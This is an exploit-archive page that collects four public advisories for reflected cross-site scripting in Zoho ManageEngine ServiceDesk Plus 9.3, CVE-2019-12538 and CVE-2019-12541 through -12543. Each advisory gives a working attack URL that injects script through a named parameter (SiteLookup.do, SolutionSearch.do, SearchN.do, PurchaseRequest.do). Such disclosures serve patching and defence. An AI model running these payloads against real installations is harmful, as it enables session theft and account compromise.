Share
## https://sploitus.com/exploit?id=PACKETSTORM:153165
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do  
# Date: 2019-06-04  
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)  
# Vendor Homepage: https://www.manageengine.com/products/service-desk  
# Version: Zoho ManageEngine ServiceDesk Plus 9.3  
# CVE : CVE-2019-12538  
  
  
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SiteLookup.do qc_siteID parameter  
  
  
Attack vector: domain/SiteLookup.do?configID=0&SELECTSITE=qc_siteID"/><svg onload=alert('XSS')>&userConfigID=21111111&SELECTEDSITEID=1&SELECTEDSITENAME=  
  
PoC: https://drive.google.com/file/d/1Oo_lC_XCtAiF2Gvx_ZoS8Yqwunc1U_57/view  
  
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SolutionSearch.do   
# Date: 2019-06-04  
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)  
# Vendor Homepage: https://www.manageengine.com/products/service-desk  
# Version: Zoho ManageEngine ServiceDesk Plus 9.3  
# CVE : CVE-2019-12541  
  
  
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SolutionSearch.do searchText parameter.  
  
  
Attack vector: domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f706z8rz68&selectName=Solutions  
  
  
PoC: https://drive.google.com/file/d/1zXyFpVwAPc0MfcERNmvIdyKLzx0JMA9r/view  
  
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SearchN.do  
# Date: 2019-06-04  
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)  
# Vendor Homepage: https://www.manageengine.com/products/service-desk  
# Version: Zoho ManageEngine ServiceDesk Plus 9.3  
# CVE : CVE-2019-12542  
  
  
An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the SearchN.do userConfigID parameter.  
  
  
Attack vector: domain/SearchN.do?searchText=a&SELECTEDSITEID=1&SELECTEDSITENAME=&configID=0&SELECTSITE=qc_siteID&submitbutton=Go&userConfigID=21111111ucgol"><img src%3da onerror%3dalert('XSS')>qzmm3u7id8z&selectName=Site  
  
PoC: https://drive.google.com/file/d/1aJN6GudSd7WWckXWxA5nelM48Xib9eS9/view  
  
# Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via PurchaseRequest.do  
# Date: 2019-06-04  
# Exploit Author: Tarantula Team - VinCSS (a member of Vingroup)  
# Vendor Homepage: https://www.manageengine.com/products/service-desk  
# Version: Zoho ManageEngine ServiceDesk Plus 9.3  
# CVE : CVE-2019-12543  
  
  
Information Description: An issue was discovered in Zoho ManageEngine ServiceDesk Plus 9.3. There is XSS via the PurchaseRequest.do serviceRequestId parameter.  
  
  
Attack vector: domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=g24aj%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3Eqdaxl  
  
  
PoC: https://drive.google.com/file/d/1pHeq446oNonw5ZJ53idKhP8gC-9CZtQW/view